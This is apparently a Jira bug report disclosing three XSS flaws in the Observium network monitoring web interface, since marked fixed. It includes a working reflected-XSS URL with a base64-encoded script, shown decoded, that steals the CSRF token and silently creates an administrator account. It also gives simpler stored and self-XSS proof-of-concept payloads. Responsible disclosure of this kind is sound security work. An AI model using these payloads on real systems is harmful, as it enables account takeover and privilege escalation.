Uploaded image for project: 'Observium'
  1. Observium
  2. OBS-4812

[Security] Three XSS vulnerabilities

    XMLWordPrintable

Details

    • Bug
    • Resolution: Fixed
    • Major
    • None
    • CE-22.5
    • Security, Web Interface
    • None

    Description

      Hello! Three XSS vulnerabilities were discovered in Observium CE 23.9.13005 (this was the latest version at the time of analysis)
       
      Could you and I conduct additional analysis to confirm the presence of these vulnerabilities? If confirmed, please register CVE identifiers for them.

      №1 Reflected XSS in section field

      CVSS:3.1: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

      The vulnerability is that the passed value of the section variable in the URL is included in the HTML page without prior validation/sanitization.

      Example payload for calling the alert(1) function (The link must be followed by a user who has access to the device section)

      http://IP/device/device=1/tab=logs/section=%22%3E%3Cdetails%20ontoggle=%22eval(atob('YWxlcnQoMSk='))%20open%3E 


      Example payload for adding an admin user with maximum privilege level. (The link must be followed by a user who has access to the device section)

      http://10.64.165.133/device/device=1/tab=logs/section=%22%3E%3Cdetails%20ontoggle=%22eval(atob('Ly8gR0VUIENTUkYgdG9rZW4KdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwp4aHIub3BlbignR0VUJywgJy91c2VyX2FkZC8nLCBmYWxzZSk7Cnhoci53aXRoQ3JlZGVudGlhbHMgPSB0cnVlOwp4aHIuc2VuZCgpOwp2YXIgZG9jID0gbmV3IERPTVBhcnNlcigpLnBhcnNlRnJvbVN0cmluZyh4aHIucmVzcG9uc2VUZXh0LCAndGV4dC9odG1sJyk7CnZhciBjc3JmdG9rZW4gPSBlbmNvZGVVUklDb21wb25lbnQoZG9jLmdldEVsZW1lbnRCeUlkKCdyZXF1ZXN0dG9rZW4nKS52YWx1ZSk7CgovLyBBZGQgVXNlcgp2YXIgY3NyZl9yZXEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKdmFyIHBhcmFtcyA9IGBuZXdfdXNlcm5hbWU9YWRtJm5ld19wYXNzd29yZD1hZG0mY2FuX21vZGlmeV9wYXNzd2Q9MSZuZXdfcmVhbG5hbWU9Jm5ld19sZXZlbD0xMCZuZXdfZW1haWw9Jm5ld19kZXNjcmlwdGlvbj0mc3VibWl0PWFkZF91c2VyJnJlcXVlc3R0b2tlbj0ke2NzcmZ0b2tlbn1gOwpjc3JmX3JlcS5vcGVuKCdQT1NUJywgJy91c2VyX2FkZC8nLCBmYWxzZSk7CmNzcmZfcmVxLnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtdHlwZScsICdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnKTsKY3NyZl9yZXEud2l0aENyZWRlbnRpYWxzID0gdHJ1ZTsKY3NyZl9yZXEuc2VuZChwYXJhbXMpOw=='))%20open%3E 

      The payload is based on the classic technique of stealing a CSRF token and then requesting to add a user. The payload encode is needed to avoid using the "/" character

      // GET CSRF token
      var xhr = new XMLHttpRequest();
      xhr.open('GET', '/user_add/', false);
      xhr.withCredentials = true;
      xhr.send();
      var doc = new DOMParser().parseFromString(xhr.responseText, 'text/html');
      var csrftoken = encodeURIComponent(doc.getElementById('requesttoken').value);
       
      // Add User
      var csrf_req = new XMLHttpRequest();
      var params = `new_username=adm&new_password=adm&can_modify_passwd=1&new_realname=&new_level=10&new_email=&new_description=&submit=add_user&requesttoken=${csrftoken}`;
      csrf_req.open('POST', '/user_add/', false);
      csrf_req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
      csrf_req.withCredentials = true;
      csrf_req.send(params); 

      This vulnerability can also be used to steal credentials by creating a fake authentication form via JavaScript.

      №2 Stored XSS in Metric Conditions

      CVSS:3.1: 8.0 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)

      When creating a check, stored XSS was detected in the Conditions Metrics field. By exploiting this vulnerability, an authenticated attacker could craft a malicious payload that, when opened by other users, would allow them to escalate privileges, obtain credentials, or cause a page to become unavailable.

      Payload to demonstrate vulnerability

      <h1> test </h1> <script> alert(1) </script> 

      №3 Self XSS in SNMPable OIDs when adding a new host

      CVSS:3.1: 7.5 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)

      When adding a new host, it was discovered that if an incorrect OID value is passed, the contents of this parameter are included in the HTML of the page without validation/sanitization. This allows Self XSS to occur if an authenticated user inserts malicious data into this field.

      Payload to demonstrate vulnerability

      "<script/src=data:,alert(1)> 

      Attachments

        1. myagent.snmpwalk
          1.08 MB
        2. image-2024-04-16-16-11-33-110.png
          image-2024-04-16-16-11-33-110.png
          96 kB
        3. image-2024-04-16-16-10-35-753.png
          image-2024-04-16-16-10-35-753.png
          7 kB
        4. image-2024-04-16-16-10-25-673.png
          image-2024-04-16-16-10-25-673.png
          83 kB
        5. image-2024-04-16-16-07-54-426.png
          image-2024-04-16-16-07-54-426.png
          45 kB
        6. broken-screenshot-2.png
          broken-screenshot-2.png
          5 kB
        7. broken-screenshot-1.png
          broken-screenshot-1.png
          157 kB

        Activity

          People

            landy Mike Stupalov
            Melizzgh Melizzgh
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: